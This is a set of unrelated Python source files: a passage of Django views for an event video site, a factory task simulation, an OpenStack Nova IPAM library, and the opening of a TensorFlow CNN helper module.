return self.cant_edit_discussion(event, request)
return event
def get(self, request, slug, form=None):
event = self.get_event_safely(slug, request)
if isinstance(event, http.HttpResponse):
return event
discussion = Discussion.objects.get(event=event)
if form is None:
initial = {
'moderators': ', '.join(
x.email for x in discussion.moderators.all()
),
}
form = forms.EventDiscussionForm(
instance=discussion,
event=event,
initial=initial,
)
context = {
'event': event,
'form': form,
}
return render(request, self.template_name, context)
@transaction.atomic
@json_view
def post(self, request, slug):
event = self.get_event_safely(slug, request)
if isinstance(event, http.HttpResponse):
return event
if 'cancel' in request.POST:
return redirect('main:event', event.slug)
discussion = Discussion.objects.get(event=event)
form = forms.EventDiscussionForm(
request.POST,
instance=discussion,
event=event,
)
if form.is_valid():
form.save()
return redirect('main:event', event.slug)
return self.get(request, slug, form=form)
@json_view
def all_tags(request):
tags = list(Tag.objects.all().values_list('name', flat=True))
return {'tags': tags}
def related_content(request, slug):
event = get_object_or_404(Event, slug=slug)
events, __, __ = find_related_events(event, request.user)
curated_groups_map = collections.defaultdict(list)
def get_curated_groups(event):
return curated_groups_map.get('event_id')
context = {
'events': events,
'get_curated_groups': get_curated_groups,
}
return render(request, 'main/es.html', context)
def find_related_events(
event, user, boost_title=None, boost_tags=None, size=None,
use_title=True, use_tags=True, explain=False
):
assert use_title or use_tags
if boost_title is None:
boost_title = settings.RELATED_CONTENT_BOOST_TITLE
if boost_tags is None:
boost_tags = settings.RELATED_CONTENT_BOOST_TAGS
if size is None:
size = settings.RELATED_CONTENT_SIZE
index = related.get_index()
doc_type = 'event'
es = related.get_connection()
fields = ['title']
if list(event.channels.all()) != [
Channel.objects.get(slug=settings.DEFAULT_CHANNEL_SLUG)]:
fields.append('channel')
mlt_queries = []
if use_title:
mlt_queries.append({
'more_like_this': {
'fields': ['title'],
# 'analyzer': 'snowball',
'docs': [
{
'_index': index,
'_type': doc_type,
'_id': event.id
}],
'min_term_freq': 1,
'max_query_terms': 20,
'min_doc_freq': 1,
# 'max_doc_freq': 2,
# 'stop_words': ['your', 'about'],
'boost': boost_title,
}
})
if use_tags and event.tags.all().exists():
fields.append('tags')
mlt_queries.append({
'more_like_this': {
'fields': ['tags'],
'docs': [
{
'_index': index,
'_type': doc_type,
'_id': event.id
}],
'min_term_freq': 1,
'max_query_terms': 20,
'min_doc_freq': 1,
'boost': boost_tags,
}
})
query_ = {
'bool': {
'should': mlt_queries,
}
}
if user.is_active:
if is_contributor(user):
query = {
'fields': fields,
'query': query_,
'filter': {
'bool': {
'must_not': {
'term': {
'privacy': Event.PRIVACY_COMPANY
}
}
}
}
}
else:
query = {
'fields': fields,
'query': query_
}
else:
query = {
'fields': fields,
'query': query_,
"filter": {
"bool": {
"must": {
"term": {"privacy": Event.PRIVACY_PUBLIC}
}
}
}
}
ids = []
query['from'] = 0
query['size'] = size
query['explain'] = explain
hits = es.search(query, index=index)['hits']
scores = {}
explanations = []
for doc in hits['hits']:
_id = int(doc['_id'])
scores[_id] = doc['_score']
ids.append(_id)
if explain:
explanations.append(doc['_explanation'])
events = Event.objects.scheduled_or_processing().filter(id__in=ids)
if user.is_active:
if is_contributor(user):
events = events.exclude(privacy=Event.PRIVACY_COMPANY)
else:
events = events.filter(privacy=Event.PRIVACY_PUBLIC)
events = sorted(events, key=lambda e: ids.index(e.id))
return (events, scores, explanations)
def channels(request):
channels = []
privacy_filter = {}
privacy_exclude = {}
if request.user.is_active:
if is_contributor(request.user):
feed_privacy = 'contributors'
privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
else:
feed_privacy = 'company'
else:
privacy_filter = {'privacy': Event.PRIVACY_PUBLIC}
feed_privacy = 'public'
events = Event.objects.filter(status=Event.STATUS_SCHEDULED)
if privacy_filter:
events = events.filter(**privacy_filter)
elif privacy_exclude:
events = events.exclude(**privacy_exclude)
children_channels = Channel.objects.filter(
parent__parent__isnull=True,
parent__isnull=False,
)
parents = collections.defaultdict(list)
for channel in children_channels:
parents[channel.parent_id].append(channel)
channels_qs = (
Channel.objects
.filter(parent__isnull=True)
.exclude(slug=settings.DEFAULT_CHANNEL_SLUG)
)
# make a dict of parental counts
subchannel_counts = {}
qs = (
Channel.objects
.filter(parent__isnull=False)
.values('parent_id')
.order_by() # necessary because the model has a default ordering
.annotate(Count('parent'))
)
for each in qs:
subchannel_counts[each['parent_id']] = each['parent__count']
# make a dict of events counts by channel
event_counts = {}
qs = (
Event.channels.through.objects.filter(event__in=events)
.values('channel_id')
.annotate(Count('channel'))
)
for each in qs:
event_counts[each['channel_id']] = each['channel__count']
for channel in channels_qs:
event_count = event_counts.get(channel.id, 0)
subchannel_count = subchannel_counts.get(channel.id, 0)
subchannels = parents.get(channel.id, [])
if event_count or subchannel_count:
channels.append((
channel,
event_count,
subchannel_count,
subchannels
))
data = {
'channels': channels,
'feed_privacy': feed_privacy,
}
return render(request, 'main/channels.html', data)
class _Tag(object):
def __init__(self, name, count):
self.name = name
self.count = count
def tag_cloud(request, THRESHOLD=1):
context = {}
qs = (
Event.tags.through.objects
.values('tag_id')
.annotate(Count('tag__id'))
)
if request.user.is_active:
if is_contributor(request.user):
# because of a bug in Django we can't use qs.exclude()
qs = qs.filter(
Q(event__privacy=Event.PRIVACY_CONTRIBUTORS) |
Q(event__privacy=Event.PRIVACY_PUBLIC)
)
else:
qs = qs.filter(event__privacy=Event.PRIVACY_PUBLIC)
tags_map = dict(
(x['id'], x['name'])
for x in
Tag.objects.all()
.values('id', 'name')
)
tags = []
for each in qs.values('tag__id__count', 'tag_id'):
count = each['tag__id__count']
if count > THRESHOLD:
tags.append(_Tag(tags_map[each['tag_id']], count))
context['tags'] = cloud.calculate_cloud(
tags,
steps=10
)
return render(request, 'main/tag_cloud.html', context)
def permission_denied(request, slug):
context = {}
event = get_object_or_404(Event, slug=slug)
context['event'] = event
context['is_contributor'] = is_contributor(request.user)
context['is_company_only'] = event.privacy == Event.PRIVACY_COMPANY
curated_groups = CuratedGroup.objects.filter(event=event).order_by('name')
context['curated_groups'] = []
for group in curated_groups:
context['curated_groups'].append({
'name': group.name,
'url': group.url
})
return render(request, 'main/permission_denied.html', context)
def contributors(request):
context = {}
cache_key = 'mozillians_contributors'
cache_key += hashlib.md5(str(settings.CONTRIBUTORS)).hexdigest()[:10]
users = cache.get(cache_key)
if users is None:
users = mozillians.get_contributors()
cache.set(cache_key, users, 60 * 60 * 24)
context['users'] = reversed(users)
return render(request, 'main/contributors.html', context)
@never_cache
@json_view
def event_livehits(request, id):
event = get_object_or_404(Event, id=id)
if request.method == 'POST' and event.is_live():
live_hits, _ = EventLiveHits.objects.get_or_create(event=event)
if request.user.is_authenticated():
cache_key = 'event_livehits-%d' % request.user.id
else:
cache_key = ''
for thing in (
'HTTP_USER_AGENT',
'HTTP_ACCEPT_LANGUAGE',
'REMOVE_ADDR',
):
value = request.META.get(thing)
if value:
cache_key += value
cache_key = 'event_livehits' + hashlib.md5(cache_key).hexdigest()
cache_key = cache_key[:30]
counted = cache.get(cache_key)
total_hits = live_hits.total_hits
if not counted:
# let's assume the longest possible time it's live is 12 hours
cache.set(cache_key, True, 60 * 60 * 12)
# we need to increment!
(
EventLiveHits.objects.filter(event=event)
.update(total_hits=F('total_hits') + 1)
)
total_hits += 1
else:
try:
total_hits = EventLiveHits.objects.get(event=event).total_hits
except EventLiveHits.DoesNotExist:
total_hits = 0
return {'hits': total_hits}
@json_view
def event_processing_timenails(request, slug):
event = get_object_or_404(Event, slug=slug)
if not event.duration:
return {'pictures': []}
form = forms.ProcessingTimenailsForm(request.GET)
if not form.is_valid():
return http.HttpResponseBadRequest(form.errors)
percentage = min(100.0, form.cleaned_data['percent'] or 100.0)
max_ = form.cleaned_data['max']
point = event.duration * percentage / 100.0
pictures = Picture.objects.filter(
event=event,
timestamp__isnull=False,
timestamp__lte=point,
)
pictures_ = []
for picture in pictures.order_by('-timestamp')[:max_]:
# NOTE! This code is the same as used
# in then EventChaptersThumbnailsView.get view.
thumb = thumbnail(
picture.file, '160x90', crop='center'
)
pictures_.append({
'id': picture.id,
'timestamp': picture.timestamp,
'thumbnail': {
'url': thumb.url,
'width': thumb.width,
'height': thumb.height,
},
})
pictures_.reverse()
return {'pictures': pictures_}
@never_cache
@json_view
def event_status(request, slug):
for values in Event.objects.filter(slug=slug).values('status'):
return {'status': values['status']}
raise http.Http404(slug)
@json_view
def thumbnails(request):
form = forms.ThumbnailsForm(request.GET)
if not form.is_valid():
return http.HttpResponseBadRequest(form.errors)
id = form.cleaned_data['id']
width = form.cleaned_data['width']
height = form.cleaned_data['height']
geometry = '%sx%s' % (width, height)
event = get_object_or_404(Event, id=id)
thumbnails = []
for picture in Picture.objects.filter(event=event).order_by('created'):
thumb = thumbnail(picture.file, geometry, crop='center')
thumbnails.append(thumb.url)
return {'thumbnails': thumbnails}
|
|
# // Copyright (c) <2014> <Brian Wheatman>
from collections import Counter
import random
import copy
# the basic task
class Task():
def __init__(self, set_inputs, inputs_to_output, set_up_time, processing_time,\
output, output_a_round, items_waiting , items_done, in_set_up, counter , on_off , broken, stats, robot_id, \
price_input, price_output, task_name = ""):
# each task will store
# # what the task can take (list of strings)
# # how many inputs it takes a round (list of ints)
# # set up time (float)
# # processing time for each (float)
# # what the robot outputs (string)
# # how many outputs made in a round (int)
# # items waiting to be processed on [list of ints]
# # items already processed (list of int)
# # whether or not the robot is currently in a setup phase (Boolean)
# # a counter (list of int)
# # whether or not the task is in use (boolean)
# # whether or not the task is broken (boolean)
# # stats about the task (list)
# # # [[time on, time setting up, time producing, idle time, total time], number of exports, [average length of queues]]
stats[2] = [0]*len(set_inputs)
self.startState=[set_inputs, inputs_to_output, set_up_time, processing_time,\
output, output_a_round, items_waiting, items_done, in_set_up, counter, on_off, broken, stats]
self.id = robot_id
self.save_startState = copy.deepcopy(self.startState)
self.input_price = price_input
self.output_price = price_output
self.task_name= task_name
self.push = False
self.number_push = 1 # for now push all
"""
state[0] = input list
state[1] = inputs to outputs
state[2] = set up times
state[3] = processing times
state[4] = output
state[5] = outputs a timestep
state[6] = items in queue
state[7] = finished items
state[8] = if in set up
state[9] = counter
state[10] = if it is on or off, true is off false is on
state[11] = if broken
state[12] = stats
state[12][0] = time information
state[12][0][0] = time on
state[12][0][1] = time seting up
state[12][0][2] = time making something
state[12][0][3] = time starved
state[12][0][4] = total time
state[12][1] = total number of outputs
state[12][2] = average length of queue
"""
def __repr__(self):
# the task will tell about itself when you print it
state = self.startState
a0 = self.task_name # + "\n"
a1 = "this task is done by robot " + str(self.id) + "\n"
a = "This task takes input " + str(state[0]) + "\n"
b = "It takes " + str(state[1]) + " inputs each round.\n"
c = "This task takes " + str(state[2]) + " minutes to set up.\n"
d = "This task takes " + str(state[3]) + " minutes to process each item.\n"
e = "This task outputs " + state[4] + "\n"
f = "It makes " + str(state[5]) + " outputs each round.\n"
g = "This task has " + str(state[6]) + " items waiting.\n"
h = "This task has " + str(state[7]) + " items finished.\n"
if state[8][0]:
i = "This task is currently in the setup phase.\n"
else:
i = "This task is not currently in the setup phase.\n"
if state[10][0]:
j = "This task is currently off.\n"
else:
j = "This task is currently on.\n"
if state[11][0]:
k = "This task is currently broken.\n"
else:
k = "This task is not currently broken.\n"
l = "counter is at " + str(state[9][0]) + ".\n"
m = "this task has been running for " + str(state[12][0][0]) + " minutes\n"
n = "this task has exported " + str(state[12][1]) + " items\n"
return a0# +a1+a#+b+c+d+e+f+g+h+i+j+k+l+m+n # how much to show to make it easier to display
# to change what the task takes as input
def set_input(self,input_list):
self.startState[0] = input_list
# to change the set up times
def set_set_up_time(self, set_up_time):
self.startState[2] = set_up_time
# to change the processing times
def set_processing_time(self, processing_time):
self.startState[3] = processing_time
# to change what the output is
def set_output(self, output):
self.startState[4] = output
# to add items to the group that will be processed
def add_items_to_queue(self,index_of_item, number_of_items_to_add):
self.startState[6][index_of_item] += number_of_items_to_add
# to edit the queue as a whole
def set_queue(self, queue):
self.startState[6] = queue
# removes an item from the cue and return true if it is able to remove an item
def remove_items(self, items_to_remove):
if self.startState[7][0] >= items_to_remove: # if there are enough items to remove
self.startState[7][0] -= items_to_remove # remove the item
return True
#set how many items have been finished
def set_finished_items(self, finished):
self.startState[7] = finished
# take out of or put into set up
def set_mode(self, mode):
self.startState[8][0] = mode
# set the counter
def set_counter(self, counter):
self.startState[9] = counter
# it is posiple to add the ability to break and fix robots, but this is not currently in use
# checking if the task can be fixed
def fix(self):
if random.random()<=1: # probability of being able to fix it
self.startState[11][0] = False
# checking if the task broke
def damage(self):
if random.random()<=1:# probability of it breaking
self.startState[11][0] = True
# set the stats
def set_stats(self, stats):
self.startState[12] = stats
# turn the task on or off
def on_off(self):
if self.startState[10][0] == False: # if it is on
self.startState[10][0] = True # turn it off
self.startState[8][0] = True # make it need set up
self.startState[9][0] = 0 # set the counter to 0
else:
self.startState[10][0] = False # turn it on
self.startState[8][0] = True # make it need set up
self.startState[9][0] = 0 # set the counter to 0
# reset the task back to its starting values
def reset(self):
self.startState = copy.deepcopy(self.save_startState)
# weather or not the task auto pushes
def push_switch(self):
if self.push:
self.push = False
else:
self.push = True
# how many push at a time
def set_push_number(self, number):
self.number_push = number
# to get the next value for the state machine
def getNextValues(self, state):
#giving the variables names so they are easier to use
[set_inputs, inputs_to_output, set_up_time, processing_times,\
output, output_a_round, items_waiting, items_done, in_set_up, counter, on_off, broken, stats] = state
len_items_waiting = len(items_waiting) # to avoid looping
#check if the task can be used
if broken[0]:
pass
elif on_off[0]:
pass
elif in_set_up[0]: # if it is in set up
if counter[0] >= set_up_time: # if time passed is equal to set up time
in_set_up[0] = False # take it out of set up mode
counter[0] = 0 # and reset the counter
else: # if it is not in setup mode
if counter[0] >= processing_times: # if enough time has passed that an item has been made
# check if I could use an if any construction here
dummy = 0 #dummy variable
for i in range(len_items_waiting): # check enumerate
if items_waiting[i] < inputs_to_output[i]: # and if there are still enough items waiting to be made
dummy += 1
if dummy == 0:
for i in range(len_items_waiting):
items_waiting[i] -= inputs_to_output[i] # remove items from the items waiting
items_done[0] += output_a_round # add items to the items done
stats[1] += output_a_round #keep track of how many outputs have been done total
counter[0] = 0 # reset the counter
a = "This task has " + str(state[6]) + " items waiting. "
b = "This task has " + str(state[7]) + " items finished. "
output = a+b
stats[0][4] += 1 # total time
if in_set_up[0]:
if not on_off[0]:
counter[0] += 1 # always increase the counter if it is setting up and on
if not in_set_up[0]:
dummy2 = 0 # dummy variable
for i in range(len_items_waiting):
if items_waiting[i] < inputs_to_output[i]: # and if there are still enough items waiting to be made
dummy2 += 1
if dummy2 == 0:
counter[0] += 1 # only increase the counter if there are items that the robot could be processing
stats[0][2] += 1 # time making something
if not broken[0] and not on_off[0]:
stats[0][0] += 1 # keep track of the total number of time steps
if in_set_up[0]:
stats[0][1] +=1 # time in set up
stats[0][3] = stats[0][0] - stats[0][1] - stats[0][2] # time starved
for i in range(len(stats[2])):
if stats[0][4] == 0: # total time
stats[2][i] = 0 # average length of queue
else:
stats[2][i] = (float(stats[2][i]*(stats[0][4]-1)+items_waiting[i]))/stats[0][4] # average length of queue
state = [set_inputs, inputs_to_output, set_up_time, processing_times,\
output, output_a_round, items_waiting, items_done, in_set_up, counter, on_off, broken, stats]
return (state, output)
# to have a group of tasks connected in a push way
class TaskCombo():
def __init__(self,task_group, limitations = {}, money = 0,\
period_cost = 0, length_period= 2400, number_periods = 2 ):
self.task_successors = make_dict(task_group) #create dictionaries that keep track of flow
stats = [0]
self.startState = [task_group, stats] # the task list and stats
self.save_startState = copy.deepcopy(self.startState) # to be able to reset
self.cash = money
self.save_money = copy.deepcopy(self.cash)
self.limitations = limitations # of the form lim[T1] = T2, meaning T1 cant sell more than T2
self.time_limit = length_period*number_periods # time to the end of the game
self.period_cost = period_cost # how much the bills are per period
self.length_period = length_period # how long each period is
self.number_periods = number_periods # how many periods there are
self.push_direction = {} # what direction is everythng currently pushing
for task in self.task_successors: # for each task that has something to push to
if self.task_successors[task][0] in task_group: # if it can only push to one task
self.push_direction[task] = self.task_successors[task]
else: # if it has multiple options
self.push_direction[task] = self.task_successors[task][0]# give it the first option
self.sell_amounts = {} # how much has each task sold
for task in task_group:
self.sell_amounts[task] = 0
def __repr__(self):
# when printed, print out the information for each task and the total time
state = self.startState
string = ""
for i in range(len(state[0])):
string = string + "task " + str(i+1) + " \n" +state[0][i].__repr__() + " \n"
string2 = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX the total time passed is " + str(state[1][0]) + " XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n"
return string + string2
def update_clock(self, time):
self.startState[1][0] = time
# to push
def push_action(self, task, number, target): # task = what task is pushing; number is how many to push; target is where they are going
if task.startState[7][0] >= number: # if there is more than the number to push
task.remove_items(number) # remove that number
target[0].add_items_to_queue(target[1], number) # and add to the target
elif task.startState[7][0] >= 1: # if there is less than the number to push
target[0].add_items_to_queue(target[1], task.startState[7][0]) # add all of them to the queue
task.remove_items(task.startState[7][0]) # and remove them from the task
# change where a task will push
def change_push_direction(self, task):
for i in range(len(self.task_successors[task])):
if self.push_direction[task] == self.task_successors[task][i]:
self.push_direction[task] = self.task_successors[task][(i+1)%len(self.task_successors[task])] # cycle through all of the options
break
# to reset
def reset(self):
self.startState = copy.deepcopy(self.save_startState)
self.cash = copy.deepcopy(self.save_money)
def add_money(self, amount):
self.cash += amount
def lose_money(self, amount):
self.cash -= amount
# chck if there are any splits
def check_for_splits(self, task_group):
for task in task_group:
if self.task_successors[bot][0] not in task_group:
return True
return False
def getNextValues(self, state):
task_path = self.task_successors #the dictionary that deals with flow
list_of_tasks = state[0] #what tasks are in this system
output_list = [0]*len(list_of_tasks) #declaring the output list
new_state_of_task = [0]*len(list_of_tasks[0].startState) # declaring the list that will be the next state
len_list_of_tasks = len(list_of_tasks) #to avoid looping
# adding and removing items accordingly to push them through the system
for i in range(len_list_of_tasks): # for each task
if list_of_tasks[i] in task_path: # if it is not an end
[successor, index_of_input] = task_path[list_of_tasks[i]]
if list_of_tasks[i].push: # if the task is on auto push
self.push_action(list_of_tasks[i], 100000000, self.push_direction[list_of_tasks[i]]) # push all
# resetting the tasks with the changes the last pass through had on them
for i in range(len_list_of_tasks):
(new_state_of_task,output_list[i])=list_of_tasks[i].getNextValues(list_of_tasks[i].startState) # getting the new values for each task
list_of_tasks[i].set_queue(new_state_of_task[6]) # set the value
list_of_tasks[i].set_finished_items(new_state_of_task[7]) # set the value
list_of_tasks[i].set_counter(new_state_of_task[9]) # set the value
list_of_tasks[i].set_stats(new_state_of_task[12]) # set the value
list_of_tasks[i].set_mode(new_state_of_task[8][0]) # set the value
# the next state
time = state[1][0]+1
stats = [time]
self.update_clock(time)
new_state_plus_stats = [list_of_tasks, stats]
return (new_state_plus_stats, output_list)
# create a dictionary to keep track of how the items flow through the factory
def make_dict(task_group):
task_successors = {} #declare the empty dict
len_task_group = len(task_group) # to avoid looping
for i in range(len_task_group): # check each one
for j in range(len_task_group): # against every other one
if task_group[i].startState[4] in task_group[j].startState[0]: #if the output of one is in the input of another
number_inputs = len(task_group[j].startState[0]) # to avoid looping
for k in range(number_inputs): # check every input
if task_group[i].startState[4] == task_group[j].startState[0][k]: # if the output of one is the input of the next
successor = task_group[j]
index_of_input = k
# each task is the key to which robot it passes on to and which slot its output goes into
if task_group[i] in task_successors:
task_successors[task_group[i]] = (task_successors[task_group[i]], (successor, index_of_input))
else:
task_successors[task_group[i]] = (successor, index_of_input)
return task_successors
# make the grid to display
def make_grid(task_group):
task_group_edit = task_group[:] # an editable group of tasks
task_successors = make_dict(task_group) # make the dictionairy
following_task = {} # a dictionairy that doesn't include the index of the input
for task in task_successors:
if type(task_successors[task][0]) != tuple:
following_task[task] = [task_successors[task][0]]
else:
following_task[task] = [term[0] for term in task_successors[task]]
ends = []
starts = []
not_starts = [] # to help find starts
for task in task_group:
if task in following_task:
for item in following_task[task]:
if item not in not_starts:
not_starts.append(item) # if something pushes to it it is not a start
else:
ends.append(task) # if it pushes to nothing it is an end
starts = task_group[:]
for item in not_starts:
starts.remove(item)
# to find all the path from one start to one ends
def find_all_paths(graph, start, end, path=[]):
path = path + [start] # the path is the current path + the next start
if start == end: # if the start is the end , the path has been found
return [path]
if not graph.has_key(start): # if the start has no successors there is not path
return []
paths = [] # all of the paths
for node in graph[start]: # for all of the successors of the start
if node not in path: # if that node is not already in the path
newpaths = find_all_paths(graph, node, end, path) # strart again using that node
for newpath in newpaths:
paths.append(newpath) # append all of the new paths
return paths
paths = []
for start in starts: # for every start
for end in ends: # and every end
if find_all_paths(following_task, start, end) != []: # if there is a path
paths.append(find_all_paths(following_task, start, end)) # append all of the paths
task_grid = [] # the grid of the tasks
for path in paths:
for item in path:
task_grid.append(item) # append all of the paths found
grid_width = len(task_grid) # start guess for the length
grid_length = 0
# find the true length by finding the longest path
for row in task_grid:
if len(row) > grid_length:
grid_length = len(row)
# make all the rows the same lenth
for row in task_grid:
if len(row) != grid_length:
for dif in range(grid_length-len(row)):
row.insert(0,None)
# if the task has already been placed, only show the first one
for i in range(grid_width):
for j in range(grid_length):
if task_grid[i][j] in task_group_edit:
task_group_edit.remove(task_grid[i][j])
else:
task_grid[i][j] = None
task_grid = [row for row in task_grid if row != [None]*grid_length] # removing empty rows from the task grid
grid_width = len(task_grid)
grid_length = len(task_grid[0])
return (task_grid, grid_width, grid_length)
# to test the simulation without the gui
# allows you to have it run for n steps
def test(a, n = 50):
state = a.startState
for i in range(n):
(state, output) = a.getNextValues(state)
#print output
print a
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Nicira Networks, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
from nova import db
from nova import exception
from nova import flags
from nova import ipv6
from nova import log as logging
from nova.network import manager
LOG = logging.getLogger(__name__)
FLAGS = flags.FLAGS
def get_ipam_lib(net_man):
return QuantumNovaIPAMLib(net_man)
class QuantumNovaIPAMLib(object):
"""Implements Quantum IP Address Management (IPAM) interface
using the local Nova database. This implementation is inline
with how IPAM is used by other NetworkManagers.
"""
def __init__(self, net_manager):
"""Holds a reference to the "parent" network manager, used
to take advantage of various FlatManager methods to avoid
code duplication.
"""
self.net_manager = net_manager
# NOTE(s0mik) : If DHCP is not in use, we need to timeout IPs
# periodically. See comment in deallocate_ips_by_vif for more
self.net_manager.timeout_fixed_ips = not self.net_manager.DHCP
def create_subnet(self, context, label, tenant_id,
quantum_net_id, priority, cidr=None,
gateway=None, gateway_v6=None, cidr_v6=None,
dns1=None, dns2=None):
"""Re-use the basic FlatManager create_networks method to
initialize the networks and fixed_ips tables in Nova DB.
Also stores a few more fields in the networks table that
are needed by Quantum but not the FlatManager.
"""
admin_context = context.elevated()
subnet_size = len(netaddr.IPNetwork(cidr))
networks = manager.FlatManager.create_networks(self.net_manager,
admin_context, label, cidr,
False, 1, subnet_size, cidr_v6, gateway,
gateway_v6, quantum_net_id, None, dns1, dns2,
ipam=True)
#TODO(tr3buchet): refactor passing in the ipam key so that
# it's no longer required. The reason it exists now is because
# nova insists on carving up IP blocks. What ends up happening is
# we create a v4 and an identically sized v6 block. The reason
# the quantum tests passed previosly is nothing prevented an
# incorrect v6 address from being assigned to the wrong subnet
if len(networks) != 1:
raise Exception(_("Error creating network entry"))
network = networks[0]
net = {"project_id": tenant_id,
"priority": priority,
"uuid": quantum_net_id}
db.network_update(admin_context, network['id'], net)
def delete_subnets_by_net_id(self, context, net_id, project_id):
"""Deletes a network based on Quantum UUID. Uses FlatManager
delete_network to avoid duplication.
"""
admin_context = context.elevated()
network = db.network_get_by_uuid(admin_context, net_id)
if not network:
raise Exception(_("No network with net_id = %s") % net_id)
manager.FlatManager.delete_network(self.net_manager,
admin_context, None,
network['uuid'],
require_disassociated=False)
def get_global_networks(self, admin_context):
return db.project_get_networks(admin_context, None, False)
def get_project_networks(self, admin_context):
try:
nets = db.network_get_all(admin_context.elevated())
except exception.NoNetworksFound:
return []
# only return networks with a project_id set
return [net for net in nets if net['project_id']]
def get_project_and_global_net_ids(self, context, project_id):
"""Fetches all networks associated with this project, or
that are "global" (i.e., have no project set).
Returns list sorted by 'priority'.
"""
admin_context = context.elevated()
networks = db.project_get_networks(admin_context, project_id, False)
networks.extend(self.get_global_networks(admin_context))
id_priority_map = {}
net_list = []
for n in networks:
net_id = n['uuid']
net_list.append((net_id, n["project_id"]))
id_priority_map[net_id] = n['priority']
return sorted(net_list, key=lambda x: id_priority_map[x[0]])
def allocate_fixed_ips(self, context, tenant_id, quantum_net_id,
network_tenant_id, vif_rec):
"""Allocates a single fixed IPv4 address for a virtual interface."""
admin_context = context.elevated()
network = db.network_get_by_uuid(admin_context, quantum_net_id)
address = None
if network['cidr']:
address = db.fixed_ip_associate_pool(admin_context,
network['id'],
vif_rec['instance_id'])
values = {'allocated': True,
'virtual_interface_id': vif_rec['id']}
db.fixed_ip_update(admin_context, address, values)
return [address]
def get_tenant_id_by_net_id(self, context, net_id, vif_id, project_id):
"""Returns tenant_id for this network. This is only necessary
in the melange IPAM case.
"""
return project_id
def get_subnets_by_net_id(self, context, tenant_id, net_id, _vif_id=None):
"""Returns information about the IPv4 and IPv6 subnets
associated with a Quantum Network UUID.
"""
n = db.network_get_by_uuid(context.elevated(), net_id)
subnet_v4 = {
'network_id': n['uuid'],
'cidr': n['cidr'],
'gateway': n['gateway'],
'broadcast': n['broadcast'],
'netmask': n['netmask'],
'version': 4,
'dns1': n['dns1'],
'dns2': n['dns2']}
#TODO(tr3buchet): I'm noticing we've assumed here that all dns is v4.
# this is probably bad as there is no way to add v6
# dns to nova
subnet_v6 = {
'network_id': n['uuid'],
'cidr': n['cidr_v6'],
'gateway': n['gateway_v6'],
'broadcast': None,
'netmask': n['netmask_v6'],
'version': 6,
'dns1': None,
'dns2': None}
return [subnet_v4, subnet_v6]
def get_routes_by_ip_block(self, context, block_id, project_id):
"""Returns the list of routes for the IP block"""
return []
def get_v4_ips_by_interface(self, context, net_id, vif_id, project_id):
"""Returns a list of IPv4 address strings associated with
the specified virtual interface, based on the fixed_ips table.
"""
# TODO(tr3buchet): link fixed_ips to vif by uuid so only 1 db call
vif_rec = db.virtual_interface_get_by_uuid(context, vif_id)
fixed_ips = db.fixed_ips_by_virtual_interface(context,
vif_rec['id'])
return [fixed_ip['address'] for fixed_ip in fixed_ips]
def get_v6_ips_by_interface(self, context, net_id, vif_id, project_id):
"""Returns a list containing a single IPv6 address strings
associated with the specified virtual interface.
"""
admin_context = context.elevated()
network = db.network_get_by_uuid(admin_context, net_id)
vif_rec = db.virtual_interface_get_by_uuid(context, vif_id)
if network['cidr_v6']:
ip = ipv6.to_global(network['cidr_v6'],
vif_rec['address'],
project_id)
return [ip]
return []
def verify_subnet_exists(self, context, tenant_id, quantum_net_id):
"""Confirms that a subnet exists that is associated with the
specified Quantum Network UUID. Raises an exception if no
such subnet exists.
"""
admin_context = context.elevated()
net = db.network_get_by_uuid(admin_context, quantum_net_id)
return net is not None
def deallocate_ips_by_vif(self, context, tenant_id, net_id, vif_ref):
"""Deallocate all fixed IPs associated with the specified
virtual interface.
"""
admin_context = context.elevated()
fixed_ips = db.fixed_ips_by_virtual_interface(admin_context,
vif_ref['id'])
# NOTE(s0mik): Sets fixed-ip to deallocated, but leaves the entry
# associated with the instance-id. This prevents us from handing it
# out again immediately, as allocating it to a new instance before
# a DHCP lease has timed-out is bad. Instead, the fixed-ip will
# be disassociated with the instance-id by a call to one of two
# methods inherited from FlatManager:
# - if DHCP is in use, a lease expiring in dnsmasq triggers
# a call to release_fixed_ip in the network manager.
# - otherwise, _disassociate_stale_fixed_ips is called periodically
# to disassociate all fixed ips that are unallocated
# but still associated with an instance-id.
for fixed_ip in fixed_ips:
db.fixed_ip_update(admin_context, fixed_ip['address'],
{'allocated': False,
'virtual_interface_id': None})
if len(fixed_ips) == 0:
LOG.error(_('No fixed IPs to deallocate for vif %s'),
vif_ref['id'])
def get_allocated_ips(self, context, subnet_id, project_id):
"""Returns a list of (ip, vif_id) pairs"""
admin_context = context.elevated()
ips = db.fixed_ip_get_all(admin_context)
allocated_ips = []
# Get all allocated IPs that are part of this subnet
network = db.network_get_by_uuid(admin_context, subnet_id)
for ip in ips:
# Skip unallocated IPs
if not ip['allocated'] == 1:
continue
if ip['network_id'] == network['id']:
vif = db.virtual_interface_get(admin_context,
ip['virtual_interface_id'])
allocated_ips.append((ip['address'], vif['uuid']))
return allocated_ips
def get_floating_ips_by_fixed_address(self, context, fixed_address):
return db.floating_ip_get_by_fixed_address(context, fixed_address)
|
|
# -*- coding:utf8 -*-
# File : cnn.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 12/30/16
#
# This file is part of TensorArtist.
from ._defaults import __default_dtype__, __default_nonlin__
from .helper import as_varnode, get_4dshape, get_2dshape, wrap_varnode_func, wrap_force_named_op, StaticDynamicDim
from .helper import lazy_O as O
from ..graph.env import Env, get_default_env
import tensorflow as tf
import functools
__all__ = ['conv2d', 'pooling2d', 'max_pooling2d', 'avg_pooling2d', 'fc', 'ntn', 'dropout', 'batch_norm', 'deconv2d']
@wrap_force_named_op
def conv2d(name, inpvar, nr_output_channels, kernel, stride=1, padding='SAME',
use_bias=True, bias_is_shared_in_channel=True,
nonlin=__default_nonlin__,
W=None, b=None, param_dtype=__default_dtype__):
inpvar = as_varnode(inpvar)
kernel = get_2dshape(kernel)
